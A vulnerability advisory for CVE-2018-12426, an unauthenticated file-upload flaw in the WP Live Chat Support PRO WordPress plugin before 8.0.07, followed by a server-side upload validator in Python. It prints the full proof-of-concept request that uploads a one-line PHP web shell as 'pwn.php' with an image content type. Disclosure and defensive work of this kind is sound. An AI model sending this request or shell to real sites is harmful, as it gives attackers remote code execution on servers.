CVE-2018-12426

[Suggested description]

 The WP live chat support PRO plugin before 8.0.07 for WordPress is
 vulnerable to unauthenticated Remote Code Execution due to
 client-side validation of allowed file types, as demonstrated by a
 v1/remote_upload request with a .php filename and the image/jpeg
 content type.

[Additional Information]

 The following request was used to upload malicious files to the server:

 POST /wp-json/wp_live_chat_support/v1/remote_upload HTTP/1.1
 Host: localhost:8000
 Cookie: wp-settings-1=mfold%3Do%26imgsize%3Dfull%26libraryContent%3Dbrowse; wp-settings-time-1=1523622040; wplc_chat_status=5; 

  ... 7109443162421071041760069510
 Content-Disposition: form-data; name="file"; filename="pwn.php"
 Content-Type: image/jpeg

 <?php echo system($_GET["CMD"]); ?

  ... 7109443162421071041760069510
 Content-Disposition: form-data; name="timestamp"

 1528969272366
  ... 7109443162421071041760069510--

 //////////////////////////////////////////////////////////////////////////////////////////////////////////////////
 //////////////////////////////////////////////////////////////////////////////////////////////////////////////////

 The response shows the file path where the file has been stored:

 HTTP/1.1 200 OK

 {"response":"http:\/\/localhost:8000\/wp-content\/uploads\/wp_live_chat\/\/pwn.php"}

[Vulnerability Type]

Insecure file-upload / Remote code execution

[Vendor of Product]

CodeCabin_ / WP-livechat

[Affected Product Code Base]

WP live chat support - PRO - All versions < 8.0.07

[Affected Component]

 WP live chat support PRO - all versions < 8.0.07

[Attack Type]

Remote

[Impact Code execution]

true

[Attack Vectors]

 The affected versions of WP live chat support PRO allow
 unauthenticated users to upload files through the chat window. The
 allowed file types (extensions) are validated only by client-side
 constraints. An attacker who submits a POST request directly to the
 endpoint responsible for the file upload bypasses the client-side
 constraints and can upload malicious files to the target server.
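
 The server-side check whose absence is described above, as an added example (not the plugin's code or the vendor's fix, neither of which appears on this page). The allow-list, the magic-byte signatures and all names in it are assumptions; the client's filename and Content-Type are treated as untrusted, and the stored name is chosen by the server.

```python
import os
import secrets

# Assumed allow-list for chat attachments: extension -> accepted leading bytes.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".pdf": (b"%PDF-",),
}

# Constructed sample mirroring the request in this advisory (body is a placeholder).
SAMPLE = ("pwn.php", "image/jpeg", b"<?php /* placeholder */ ?>")


class UploadRejected(Exception):
    """Raised when an upload fails server-side validation."""


def validate_upload(client_filename, client_content_type, body):
    """Return a server-chosen storage name, or raise UploadRejected.

    client_content_type is a parameter only to show that it is ignored:
    like the filename, it is attacker-controlled request data.
    """
    # Drop any path component the client sent (both separator styles).
    base = os.path.basename(client_filename.replace("\\", "/"))
    if "\x00" in base:
        raise UploadRejected("NUL byte in filename")
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext or '(none)'} not allowed")
    # The content must begin with a signature that matches the extension.
    if not body.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    # Never reuse the client's name on disk; keep only the vetted extension.
    return secrets.token_hex(16) + ext
```

 A signature check only proves how a file begins, so the upload directory should also be configured so that the web server never executes scripts from it.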

[Has vendor confirmed or acknowledged the vulnerability?]

true

[Discoverer]

Riccardo ten Cate

[Reference]

https://github.com/RiieCco/write-ups/tree/master/CVE-2018-12426